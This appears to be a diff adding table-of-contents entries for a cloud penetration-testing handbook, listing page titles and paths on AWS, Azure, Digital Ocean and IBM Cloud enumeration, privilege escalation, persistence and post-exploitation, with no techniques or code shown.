+ - [AWS - CloudFront Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md)
+ - [AWS - CodeBuild Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md)
+ - [AWS Codebuild - Token Leakage](pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md)
+ - [AWS - Control Tower Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md)
+ - [AWS - DLM Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.md)
+ - [AWS - DynamoDB Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md)
+ - [AWS - EC2, EBS, SSM & VPC Post 
Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md)
+ - [AWS - EBS Snapshot Dump](pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md)
+ - [AWS - Malicious VPC Mirror](pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.md)
+ - [AWS - ECR Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.md)
+ - [AWS - ECS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.md)
+ - [AWS - EFS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.md)
+ - [AWS - EKS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.md)
+ - [AWS - Elastic Beanstalk Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md)
+ - [AWS - IAM Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.md)
+ - [AWS - KMS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.md)
+ - [AWS - Lambda Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md)
+ - [AWS - Steal Lambda Requests](pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md)
+ - [AWS - Lightsail Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation.md)
+ - [AWS - Organizations Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-organizations-post-exploitation.md)
+ - [AWS - RDS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.md)
+ - [AWS - S3 Post 
Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.md)
+ - [AWS - Secrets Manager Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.md)
+ - [AWS - SES Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.md)
+ - [AWS - SNS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.md)
+ - [AWS - SQS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.md)
+ - [AWS - SSO & identitystore Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md)
+ - [AWS - Step Functions Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md)
+ - [AWS - STS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.md)
+ - [AWS - VPN Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.md)
+ - [AWS - Privilege Escalation](pentesting-cloud/aws-security/aws-privilege-escalation/README.md)
+ - [AWS - Apigateway Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.md)
+ - [AWS - Chime Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.md)
+ - [AWS - Codebuild Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md)
+ - [AWS - Codepipeline Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.md)
+ - [AWS - Codestar Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/README.md)
+ - [codestar:CreateProject, codestar:AssociateTeamMember](pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/codestar-createproject-codestar-associateteammember.md)
+ - [iam:PassRole, 
codestar:CreateProject](pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.md)
+ - [AWS - Cloudformation Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/README.md)
+ - [iam:PassRole, cloudformation:CreateStack,and cloudformation:DescribeStacks](pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md)
+ - [AWS - Cognito Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.md)
+ - [AWS - Datapipeline Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.md)
+ - [AWS - Directory Services Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.md)
+ - [AWS - DynamoDB Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.md)
+ - [AWS - EBS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.md)
+ - [AWS - EC2 Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.md)
+ - [AWS - ECR Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.md)
+ - [AWS - ECS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.md)
+ - [AWS - EFS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.md)
+ - [AWS - Elastic Beanstalk Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.md)
+ - [AWS - EMR Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.md)
+ - [AWS - EventBridge Scheduler Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.md)
+ - [AWS - Gamelift](pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.md)
+ - [AWS - Glue 
Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.md)
+ - [AWS - IAM Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.md)
+ - [AWS - KMS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.md)
+ - [AWS - Lambda Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.md)
+ - [AWS - Lightsail Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.md)
+ - [AWS - Mediapackage Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.md)
+ - [AWS - MQ Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.md)
+ - [AWS - MSK Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.md)
+ - [AWS - RDS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.md)
+ - [AWS - Redshift Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.md)
+ - [AWS - Route53 Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md)
+ - [AWS - SNS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.md)
+ - [AWS - SQS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.md)
+ - [AWS - SSO & identitystore Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.md)
+ - [AWS - Organizations Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.md)
+ - [AWS - S3 Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.md)
+ - [AWS - Sagemaker Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md)
+ - [AWS - Secrets Manager Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.md)
+ - [AWS - 
SSM Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.md)
+ - [AWS - Step Functions Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.md)
+ - [AWS - STS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.md)
+ - [AWS - WorkDocs Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.md)
+ - [AWS - Services](pentesting-cloud/aws-security/aws-services/README.md)
+ - [AWS - Security & Detection Services](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/README.md)
+ - [AWS - CloudTrail Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md)
+ - [AWS - CloudWatch Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.md)
+ - [AWS - Config Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.md)
+ - [AWS - Control Tower Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.md)
+ - [AWS - Cost Explorer Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.md)
+ - [AWS - Detective Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.md)
+ - [AWS - Firewall Manager Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.md)
+ - [AWS - GuardDuty Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.md)
+ - [AWS - Inspector Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.md)
+ - [AWS - Macie Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.md)
+ - [AWS - Security Hub 
Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.md)
+ - [AWS - Shield Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-shield-enum.md)
+ - [AWS - Trusted Advisor Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md)
+ - [AWS - WAF Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md)
+ - [AWS - API Gateway Enum](pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.md)
+ - [AWS - Certificate Manager (ACM) & Private Certificate Authority (PCA)](pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.md)
+ - [AWS - CloudFormation & Codestar Enum](pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md)
+ - [AWS - CloudHSM Enum](pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.md)
+ - [AWS - CloudFront Enum](pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.md)
+ - [AWS - Codebuild Enum](pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.md)
+ - [AWS - Cognito Enum](pentesting-cloud/aws-security/aws-services/aws-cognito-enum/README.md)
+ - [Cognito Identity Pools](pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.md)
+ - [Cognito User Pools](pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.md)
+ - [AWS - DataPipeline, CodePipeline & CodeCommit Enum](pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md)
+ - [AWS - Directory Services / WorkDocs Enum](pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.md)
+ - [AWS - DocumentDB Enum](pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.md)
+ - [AWS - DynamoDB Enum](pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.md)
+ - [AWS - EC2, 
EBS, ELB, SSM, VPC & VPN Enum](pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md)
+ - [AWS - Nitro Enum](pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.md)
+ - [AWS - VPC & Networking Basic Information](pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.md)
+ - [AWS - ECR Enum](pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md)
+ - [AWS - ECS Enum](pentesting-cloud/aws-security/aws-services/aws-ecs-enum.md)
+ - [AWS - EKS Enum](pentesting-cloud/aws-security/aws-services/aws-eks-enum.md)
+ - [AWS - Elastic Beanstalk Enum](pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.md)
+ - [AWS - ElastiCache](pentesting-cloud/aws-security/aws-services/aws-elasticache.md)
+ - [AWS - EMR Enum](pentesting-cloud/aws-security/aws-services/aws-emr-enum.md)
+ - [AWS - EFS Enum](pentesting-cloud/aws-security/aws-services/aws-efs-enum.md)
+ - [AWS - EventBridge Scheduler Enum](pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md)
+ - [AWS - Kinesis Data Firehose Enum](pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.md)
+ - [AWS - IAM, Identity Center & SSO Enum](pentesting-cloud/aws-security/aws-services/aws-iam-enum.md)
+ - [AWS - KMS Enum](pentesting-cloud/aws-security/aws-services/aws-kms-enum.md)
+ - [AWS - Lambda Enum](pentesting-cloud/aws-security/aws-services/aws-lambda-enum.md)
+ - [AWS - Lightsail Enum](pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.md)
+ - [AWS - MQ Enum](pentesting-cloud/aws-security/aws-services/aws-mq-enum.md)
+ - [AWS - MSK Enum](pentesting-cloud/aws-security/aws-services/aws-msk-enum.md)
+ - [AWS - Organizations Enum](pentesting-cloud/aws-security/aws-services/aws-organizations-enum.md)
+ - [AWS - Redshift Enum](pentesting-cloud/aws-security/aws-services/aws-redshift-enum.md)
+ - [AWS - Relational Database (RDS) 
Enum](pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.md)
+ - [AWS - Route53 Enum](pentesting-cloud/aws-security/aws-services/aws-route53-enum.md)
+ - [AWS - Secrets Manager Enum](pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md)
+ - [AWS - SES Enum](pentesting-cloud/aws-security/aws-services/aws-ses-enum.md)
+ - [AWS - SNS Enum](pentesting-cloud/aws-security/aws-services/aws-sns-enum.md)
+ - [AWS - SQS Enum](pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.md)
+ - [AWS - S3, Athena & Glacier Enum](pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.md)
+ - [AWS - Step Functions Enum](pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.md)
+ - [AWS - STS Enum](pentesting-cloud/aws-security/aws-services/aws-sts-enum.md)
+ - [AWS - Other Services Enum](pentesting-cloud/aws-security/aws-services/aws-other-services-enum.md)
+ - [AWS - Unauthenticated Enum & Access](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/README.md)
+ - [AWS - Accounts Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.md)
+ - [AWS - API Gateway Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md)
+ - [AWS - Cloudfront Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md)
+ - [AWS - Cognito Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.md)
+ - [AWS - CodeBuild Unauthenticated Access](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md)
+ - [AWS - DocumentDB Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.md)
+ - [AWS - DynamoDB Unauthenticated 
Access](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md)
+ - [AWS - EC2 Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md)
+ - [AWS - ECR Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md)
+ - [AWS - ECS Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md)
+ - [AWS - Elastic Beanstalk Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md)
+ - [AWS - Elasticsearch Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.md)
+ - [AWS - IAM & STS Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.md)
+ - [AWS - Identity Center & SSO Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md)
+ - [AWS - IoT Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.md)
+ - [AWS - Kinesis Video Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.md)
+ - [AWS - Lambda Unauthenticated Access](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md)
+ - [AWS - Media Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.md)
+ - [AWS - MQ Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md)
+ - [AWS - MSK Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.md)
+ - [AWS - RDS Unauthenticated 
Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md)
+ - [AWS - Redshift Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.md)
+ - [AWS - SQS Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md)
+ - [AWS - SNS Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md)
+ - [AWS - S3 Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.md)
+- [Azure Pentesting](pentesting-cloud/azure-security/README.md)
+ - [Az - Basic Information](pentesting-cloud/azure-security/az-basic-information/README.md)
+ - [Az - Tokens & Public Applications](pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.md)
+ - [Az - Enumeration Tools](pentesting-cloud/azure-security/az-enumeration-tools.md)
+ - [Az - Unauthenticated Enum & Initial Entry](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/README.md)
+ - [Az - OAuth Apps Phishing](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.md)
+ - [Az - VMs Unath](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unath.md)
+ - [Az - Device Code Authentication Phishing](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.md)
+ - [Az - Password Spraying](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying.md)
+ - [Az - Services](pentesting-cloud/azure-security/az-services/README.md)
+ - [Az - Entra ID (AzureAD) & Azure IAM](pentesting-cloud/azure-security/az-services/az-azuread.md)
+ - [Az - ACR](pentesting-cloud/azure-security/az-services/az-acr.md)
+ - [Az - Application 
Proxy](pentesting-cloud/azure-security/az-services/az-application-proxy.md)
+ - [Az - ARM Templates / Deployments](pentesting-cloud/azure-security/az-services/az-arm-templates.md)
+ - [Az - Automation Account](pentesting-cloud/azure-security/az-services/az-automation-account/README.md)
+ - [Az - State Configuration RCE](pentesting-cloud/azure-security/az-services/az-automation-account/az-state-configuration-rce.md)
+ - [Az - Azure App Service & Function Apps](pentesting-cloud/azure-security/az-services/az-app-service.md)
+ - [Az - Intune](pentesting-cloud/azure-security/az-services/intune.md)
+ - [Az - File Shares](pentesting-cloud/azure-security/az-services/az-file-shares.md)
+ - [Az - Function Apps](pentesting-cloud/azure-security/az-services/az-function-apps.md)
+ - [Az - Key Vault](pentesting-cloud/azure-security/az-services/keyvault.md)
+ - [Az - Logic Apps](pentesting-cloud/azure-security/az-services/az-logic-apps.md)
+ - [Az - Management Groups, Subscriptions & Resource Groups](pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.md)
+ - [Az - Queue Storage](pentesting-cloud/azure-security/az-services/az-queue-enum.md)
+ - [Az - Service Bus](pentesting-cloud/azure-security/az-services/az-servicebus-enum.md)
+ - [Az - SQL](pentesting-cloud/azure-security/az-services/az-sql.md)
+ - [Az - Storage Accounts & Blobs](pentesting-cloud/azure-security/az-services/az-storage.md)
+ - [Az - Table Storage](pentesting-cloud/azure-security/az-services/az-table-storage.md)
+ - [Az - Virtual Machines & Network](pentesting-cloud/azure-security/az-services/vms/README.md)
+ - [Az - Azure Network](pentesting-cloud/azure-security/az-services/vms/az-azure-network.md)
+ - [Az - Permissions for a Pentest](pentesting-cloud/azure-security/az-permissions-for-a-pentest.md)
+ - [Az - Lateral Movement (Cloud - On-Prem)](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/README.md)
+ - [Az AD Connect - Hybrid 
Identity](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/README.md)
+ - [Az- Synchronising New Users](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-synchronising-new-users.md)
+ - [Az - Default Applications](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-default-applications.md)
+ - [Az - Cloud Kerberos Trust](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.md)
+ - [Az - Federation](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/federation.md)
+ - [Az - PHS - Password Hash Sync](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.md)
+ - [Az - PTA - Pass-through Authentication](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.md)
+ - [Az - Seamless SSO](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.md)
+ - [Az - Arc vulnerable GPO Deploy Script](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.md)
+ - [Az - Local Cloud Credentials](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.md)
+ - [Az - Pass the Cookie](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.md)
+ - [Az - Pass the Certificate](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.md)
+ - [Az - Pass the PRT](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.md)
+ - [Az - Phishing Primary Refresh Token (Microsoft 
Entra)](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md)
+ - [Az - Processes Memory Access Token](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md)
+ - [Az - Primary Refresh Token (PRT)](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md)
+ - [Az - Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/README.md)
+ - [Az - Blob Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md)
+ - [Az - File Share Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md)
+ - [Az - Function Apps Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md)
+ - [Az - Key Vault Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md)
+ - [Az - Queue Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.md)
+ - [Az - Service Bus Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.md)
+ - [Az - Table Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.md)
+ - [Az - SQL Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.md)
+ - [Az - VMs & Network Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.md)
+ - [Az - Privilege Escalation](pentesting-cloud/azure-security/az-privilege-escalation/README.md)
+ - [Az - Azure IAM Privesc (Authorization)](pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md)
+ - [Az - App Services 
Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.md)
+ - [Az - EntraID Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md)
+ - [Az - Conditional Access Policies & MFA Bypass](pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md)
+ - [Az - Dynamic Groups Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md)
+ - [Az - Functions App Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md)
+ - [Az - Key Vault Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md)
+ - [Az - Queue Storage Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.md)
+ - [Az - Service Bus Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.md)
+ - [Az - Virtual Machines & Network Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md)
+ - [Az - Storage Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.md)
+ - [Az - SQL Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.md)
+ - [Az - Persistence](pentesting-cloud/azure-security/az-persistence/README.md)
+ - [Az - Queue Storage Persistence](pentesting-cloud/azure-security/az-persistence/az-queue-persistance.md)
+ - [Az - VMs Persistence](pentesting-cloud/azure-security/az-persistence/az-vms-persistence.md)
+ - [Az - Storage Persistence](pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md)
+ - [Az - Device Registration](pentesting-cloud/azure-security/az-device-registration.md)
+- [Digital Ocean Pentesting](pentesting-cloud/digital-ocean-pentesting/README.md)
+ - [DO - Basic Information](pentesting-cloud/digital-ocean-pentesting/do-basic-information.md)
+ - [DO - Permissions for a 
Pentest](pentesting-cloud/digital-ocean-pentesting/do-permissions-for-a-pentest.md)
+ - [DO - Services](pentesting-cloud/digital-ocean-pentesting/do-services/README.md)
+ - [DO - Apps](pentesting-cloud/digital-ocean-pentesting/do-services/do-apps.md)
+ - [DO - Container Registry](pentesting-cloud/digital-ocean-pentesting/do-services/do-container-registry.md)
+ - [DO - Databases](pentesting-cloud/digital-ocean-pentesting/do-services/do-databases.md)
+ - [DO - Droplets](pentesting-cloud/digital-ocean-pentesting/do-services/do-droplets.md)
+ - [DO - Functions](pentesting-cloud/digital-ocean-pentesting/do-services/do-functions.md)
+ - [DO - Images](pentesting-cloud/digital-ocean-pentesting/do-services/do-images.md)
+ - [DO - Kubernetes (DOKS)](pentesting-cloud/digital-ocean-pentesting/do-services/do-kubernetes-doks.md)
+ - [DO - Networking](pentesting-cloud/digital-ocean-pentesting/do-services/do-networking.md)
+ - [DO - Projects](pentesting-cloud/digital-ocean-pentesting/do-services/do-projects.md)
+ - [DO - Spaces](pentesting-cloud/digital-ocean-pentesting/do-services/do-spaces.md)
+ - [DO - Volumes](pentesting-cloud/digital-ocean-pentesting/do-services/do-volumes.md)
+- [IBM Cloud Pentesting](pentesting-cloud/ibm-cloud-pentesting/README.md)
+ - [IBM - Hyper Protect Crypto Services](pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-crypto-services.md)
